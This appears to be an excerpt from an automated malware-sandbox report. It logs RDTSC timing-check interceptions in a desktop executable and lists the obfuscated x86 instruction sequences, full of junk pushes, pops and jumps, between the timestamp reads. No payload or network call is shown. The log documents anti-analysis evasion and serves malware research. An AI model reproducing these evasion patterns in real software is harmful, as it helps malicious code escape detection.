Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: EE2864 second address: EE2886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jng 00007FA030F107BFh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA030F107B1h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: EE2886 second address: D69C79 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jmp 00007FA030CAD66Dh 0x0000000f pop eax 0x00000010 jng 00007FA030CAD66Ch 0x00000016 or dword ptr [ebp+122D33EDh], edi 0x0000001c push dword ptr [ebp+122D01A5h] 0x00000022 call dword ptr [ebp+122D1DB5h] 0x00000028 pushad 0x00000029 mov dword ptr [ebp+122D379Ch], ecx 0x0000002f xor eax, eax 0x00000031 jmp 00007FA030CAD671h 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a clc 0x0000003b mov dword ptr [ebp+122D3970h], eax 0x00000041 pushad 0x00000042 mov eax, esi 0x00000044 mov esi, edx 0x00000046 popad 0x00000047 mov esi, 0000003Ch 0x0000004c jmp 00007FA030CAD66Bh 0x00000051 add esi, dword ptr [esp+24h] 0x00000055 or dword ptr [ebp+122D309Bh], edx 0x0000005b stc 0x0000005c lodsw 0x0000005e or dword ptr [ebp+122D37CFh], edx 0x00000064 add eax, dword ptr [esp+24h] 0x00000068 cld 0x00000069 mov ebx, dword ptr [esp+24h] 0x0000006d mov dword ptr [ebp+122D37CFh], edx 0x00000073 push eax 0x00000074 push edi 0x00000075 push eax 0x00000076 push edx 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: EE28C3 second address: EE2914 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA030F107A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D3395h], edi 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007FA030F107A8h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f mov edx, dword ptr [ebp+122D3A18h] 0x00000035 xor dword ptr [ebp+122D1D0Eh], edi 0x0000003b call 00007FA030F107A9h 0x00000040 pushad 0x00000041 push edi 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: EE2914 second address: EE2928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 jc 00007FA030CAD666h 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: EE2928 second address: EE292C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: EE292C second address: EE29EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007FA030CAD671h 0x00000010 mov eax, dword ptr [eax] 0x00000012 jmp 00007FA030CAD674h 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b jnc 00007FA030CAD66Eh 0x00000021 pop eax 0x00000022 jmp 00007FA030CAD673h 0x00000027 push 00000003h 0x00000029 mov edi, dword ptr [ebp+122D344Bh] 0x0000002f push 00000000h 0x00000031 push 00000003h 0x00000033 mov edi, dword ptr [ebp+122D3928h] 0x00000039 push 86F0C23Ch 0x0000003e jbe 00007FA030CAD66Ch 0x00000044 pushad 0x00000045 push esi 0x00000046 pop esi 0x00000047 pushad 0x00000048 popad 0x00000049 popad 0x0000004a add dword ptr [esp], 390F3DC4h 0x00000051 push 00000000h 0x00000053 push edi 0x00000054 call 00007FA030CAD668h 0x00000059 pop edi 0x0000005a mov dword ptr [esp+04h], edi 0x0000005e add dword ptr [esp+04h], 00000015h 0x00000066 inc edi 0x00000067 push edi 0x00000068 ret 0x00000069 pop edi 0x0000006a ret 0x0000006b cld 0x0000006c lea ebx, dword ptr [ebp+1244C72Eh] 0x00000072 mov dword ptr [ebp+122D339Fh], eax 0x00000078 xchg eax, ebx 0x00000079 pushad 0x0000007a push eax 0x0000007b push edx 0x0000007c jmp 00007FA030CAD66Fh 0x00000081 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: EE29EB second address: EE29EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: EE29EF second address: EE29F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: EE29F9 second address: EE2A16 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA030F107A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FA030F107ACh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: EE2A16 second address: EE2A1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: EE2A1B second address: EE2A20 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: EE2A60 second address: EE2A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: EE2A64 second address: EE2A68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: EE2A68 second address: EE2AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a mov esi, ecx 0x0000000c clc 0x0000000d push 00000000h 0x0000000f mov dword ptr [ebp+122D17C7h], esi 0x00000015 mov dh, 00h 0x00000017 call 00007FA030CAD669h 0x0000001c jbe 00007FA030CAD672h 0x00000022 push eax 0x00000023 pushad 0x00000024 jmp 00007FA030CAD672h 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: EE2AB1 second address: EE2ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FA030F107A6h 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007FA030F107ACh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: EE2ACB second address: EE2ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: EE2ACF second address: EE2AE6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA030F107A8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jg 00007FA030F107B4h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: EE2AE6 second address: EE2AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FA030CAD666h 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007FA030CAD666h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: EE2C07 second address: EE2C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: EE2C0C second address: EE2CB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA030CAD673h 0x00000008 jmp 00007FA030CAD66Eh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 jng 00007FA030CAD668h 0x00000018 push edi 0x00000019 pop edi 0x0000001a ja 00007FA030CAD668h 0x00000020 popad 0x00000021 nop 0x00000022 cld 0x00000023 push 00000000h 0x00000025 mov dword ptr [ebp+122D17DEh], eax 0x0000002b mov si, 439Ah 0x0000002f call 00007FA030CAD669h 0x00000034 pushad 0x00000035 jne 00007FA030CAD67Bh 0x0000003b pushad 0x0000003c pushad 0x0000003d popad 0x0000003e push edi 0x0000003f pop edi 0x00000040 popad 0x00000041 popad 0x00000042 push eax 0x00000043 jmp 00007FA030CAD677h 0x00000048 mov eax, dword ptr [esp+04h] 0x0000004c pushad 0x0000004d push eax 0x0000004e jmp 00007FA030CAD66Ch 0x00000053 pop eax 0x00000054 push eax 0x00000055 push edx 0x00000056 jnc 00007FA030CAD666h 0x0000005c rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: EE2CB3 second address: EE2D66 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jg 00007FA030F107A8h 0x00000010 jmp 00007FA030F107B5h 0x00000015 popad 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jnp 00007FA030F107B2h 0x00000020 jnl 00007FA030F107ACh 0x00000026 pop eax 0x00000027 mov di, DC40h 0x0000002b push 00000003h 0x0000002d mov esi, 1D858614h 0x00000032 push 00000000h 0x00000034 pushad 0x00000035 adc cl, 00000012h 0x00000038 jmp 00007FA030F107B4h 0x0000003d popad 0x0000003e push 00000003h 0x00000040 push 7D21264Bh 0x00000045 push ecx 0x00000046 pushad 0x00000047 pushad 0x00000048 popad 0x00000049 jmp 00007FA030F107B8h 0x0000004e popad 0x0000004f pop ecx 0x00000050 add dword ptr [esp], 42DED9B5h 0x00000057 jl 00007FA030F107ACh 0x0000005d mov dword ptr [ebp+122D24D5h], esi 0x00000063 lea ebx, dword ptr [ebp+1244C742h] 0x00000069 mov edi, 1CCFA1AAh 0x0000006e push eax 0x0000006f push eax 0x00000070 push edx 0x00000071 jnp 00007FA030F107A8h 0x00000077 pushad 0x00000078 popad 0x00000079 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: EE2D66 second address: EE2D6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F02B53 second address: F02B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FA030F107ACh 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FA030F107B0h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F02B7A second address: F02BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA030CAD679h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c jnp 00007FA030CAD66Ch 0x00000012 jne 00007FA030CAD666h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F00B3B second address: F00B5E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA030F107A8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA030F107B7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F00B5E second address: F00B6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030CAD66Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F01547 second address: F0154D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F0154D second address: F01551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F01551 second address: F0155A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F016B1 second address: F016B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F016B9 second address: F016BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F016BD second address: F016E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030CAD679h 0x00000007 jns 00007FA030CAD666h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F016E8 second address: F016FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA030F107B1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F016FD second address: F0170D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA030CAD666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F0170D second address: F01717 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA030F107A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F019D4 second address: F01A35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA030CAD672h 0x00000009 jmp 00007FA030CAD673h 0x0000000e popad 0x0000000f jns 00007FA030CAD682h 0x00000015 jmp 00007FA030CAD676h 0x0000001a jne 00007FA030CAD666h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FA030CAD673h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F01A35 second address: F01A76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA030F107B6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push ebx 0x0000000d pushad 0x0000000e jmp 00007FA030F107ACh 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FA030F107B2h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F01BBE second address: F01BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F01BC2 second address: F01BC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: EF9B61 second address: EF9B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: EF9B67 second address: EF9B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: EF9B6E second address: EF9B73 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F022EA second address: F0230B instructions: 0x00000000 rdtsc 0x00000002 js 00007FA030F107B4h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F0230B second address: F0230F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F0230F second address: F02313 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F02313 second address: F0231E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: EF9B38 second address: EF9B3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: EF9B3C second address: EF9B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FA030CAD678h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F05EBE second address: F05EC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F05EC3 second address: F05EC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F05EC8 second address: F05F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FA030F107B7h 0x00000010 pushad 0x00000011 jo 00007FA030F107A6h 0x00000017 jnp 00007FA030F107A6h 0x0000001d popad 0x0000001e popad 0x0000001f mov eax, dword ptr [esp+04h] 0x00000023 push eax 0x00000024 push edx 0x00000025 jc 00007FA030F107A8h 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F05F07 second address: F05F50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030CAD674h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jnp 00007FA030CAD685h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 push edi 0x00000019 pop edi 0x0000001a pop ebx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F0BF2E second address: F0BF33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F0BF33 second address: F0BF75 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FA030CAD66Ah 0x00000008 jmp 00007FA030CAD66Ah 0x0000000d pop edx 0x0000000e jmp 00007FA030CAD676h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 jmp 00007FA030CAD66Dh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F0BF75 second address: F0BF88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA030F107AAh 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F0BF88 second address: F0BF9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030CAD672h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F10455 second address: F10473 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA030F107A6h 0x00000008 jmp 00007FA030F107ACh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007FA030F107A6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F10A22 second address: F10A28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F10A28 second address: F10A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F10A2E second address: F10A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F127FC second address: F12800 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F12800 second address: F1284A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FA030CAD66Ch 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 jmp 00007FA030CAD675h 0x00000017 je 00007FA030CAD671h 0x0000001d jmp 00007FA030CAD66Bh 0x00000022 popad 0x00000023 mov eax, dword ptr [eax] 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 jbe 00007FA030CAD666h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F1284A second address: F12876 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA030F107B8h 0x0000000b popad 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jo 00007FA030F107AEh 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F12C38 second address: F12C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F12DF9 second address: F12DFF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F12DFF second address: F12E10 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F13795 second address: F1379A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F1396F second address: F13973 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F13973 second address: F13979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F13A51 second address: F13A6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA030CAD675h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F13A6A second address: F13A7D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jbe 00007FA030F107B4h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F13A7D second address: F13A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F13FCE second address: F13FD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
